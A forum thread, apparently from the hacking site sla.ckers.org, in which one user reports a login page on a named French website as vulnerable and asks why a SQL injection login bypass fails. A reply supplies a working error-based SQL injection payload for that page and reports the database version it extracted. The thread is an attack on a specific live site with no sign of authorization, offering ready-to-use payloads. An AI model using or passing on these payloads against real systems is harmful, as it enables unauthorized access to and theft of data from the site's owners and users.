Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Vulnerable but doesn't work
Posted by: 0xAsc11
Date: April 01, 2014 12:29PM

Hi all,

this url is vulnérable : (POST)

http://www.hestia.fr/login.php
with data :
login=1&action=logue_in&code='&mdp='

i try this :
login=1&action=logue_in&code='||'a'='a&mdp='||1 limit 0,1;#

but i can't connect as a user :( what's wrong ?

any idea ?

Options: ReplyQuote
Re: Vulnerable but doesn't work
Posted by: ajkaro
Date: April 05, 2014 04:56PM

Use this post post data:

login=1&action=logue_in&code=abc') or 1 GROUP BY concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -&mdp=pass

Version: 5.5.18-log

Options: ReplyQuote


Sorry, only registered users may post in this forum.